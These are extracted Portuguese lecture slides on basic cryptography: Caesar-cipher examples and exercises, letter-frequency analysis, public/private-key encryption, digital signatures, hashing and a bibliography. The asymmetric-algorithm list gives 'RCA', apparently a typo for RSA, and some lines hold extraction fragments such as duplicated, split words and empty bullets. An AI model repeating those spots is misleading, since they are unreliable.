ƒ Texto em Claro: ABCDEFGHIJKLMNOPQRSTUVWXYZ
ƒ Texto Cifrado: DEFGHIJKLMNOPQRSTUVWXYZABC
ƒ Exemplo
• EU SOU O CARA
• HX VRX R FDUD
Exercício
ƒ Utilizando a cifra de César, mostre qual a
mensagem da frase abaixo
ƒ D FLIUD GH FHVDU SRGH
VHU TXHEUDGD
IDFLOPHQWH
53
Exercício
ƒ Utilizando a cifra de César, cifre a seguinte
mensagem.
t e n h o
a u l a
n a
E S C OL A
↓ ↓ ↓ ↓ ↓
↓ ↓ ↓ ↓
↓ ↓
↓ ↓ ↓ ↓ ↓ ↓
Exercício
ƒ Utilizando a cifra de César com k<>3. Qual o
valor de k (Deslocamento)?
54
Análise de freqüência
ƒ Baseado no fato de que certas letras e
combinações de letras aparecem com uma
certa frequencia em determinada linguagem
ƒ Em Inglês, por exemplo, é a letra E e a
menos comum Z
ƒ Em português, a letra A é a mais comum e a
letra Y a menos comum
Freqüencia das letras em Inglês
55
Freqüência das letras em Português
56
Assimétrica
ƒ Duas chaves
• 1 – cifrar
• 1 – decifrar
ƒ Chaves públicas e privadas
•
•
•
•
Você deseja enviar uma mensagem a alguém
Pede a chave pública
Cifra a mensagem com esta chave pública
Receptor decifra utilizando a chave privada
ƒ Algoritmo
• RCA
• DSA
57
Assinatura Digital
ƒ
ƒ
ƒ
ƒ
Cifragem com a sua chave privada e envia
Utilizando a chave pública, qualquer um pode decifrá-la utilizando a chave pública
autenticidade, integridade e não-repudiação da mensagem
Não garante a confidencialidade da mensagem. Qualquer um poderá acessá-la e
verificá-la
ifi á l
Hash
ƒ É um método para transformar dados de tal
forma que o resultado seja (quase) exclusivo
58
Bibliografia
ƒ
Livro texto
• FRANCO Jr. Carlos F. e-business na Infoera. 4. Ed. São Paulo: Atlas, 2006.
ISBN13: 9788522443901.
• KUROSE, JAMES F.; ROSS, KEITH W. Redes de computadores e a
internet uma nova abordagem. Addison Wesley. 3a Edição. 2007 ISBN13:
9788588639188.
• TANEMBAUM, A.S., Redes de Computadores. 4a. Ed. Rio de Janeiro:
Editora Campus, 2003. ISBN13: 9788535211856.
• TERADA
TERADA, Routo.
R t Segurança
S
de
d dados:
d d
criptografia
i t
fi em redes
d de
d
computador. São Paulo: Edgard Blücher, 2.Ed. 2008. ISBN13:
9788521204398.
59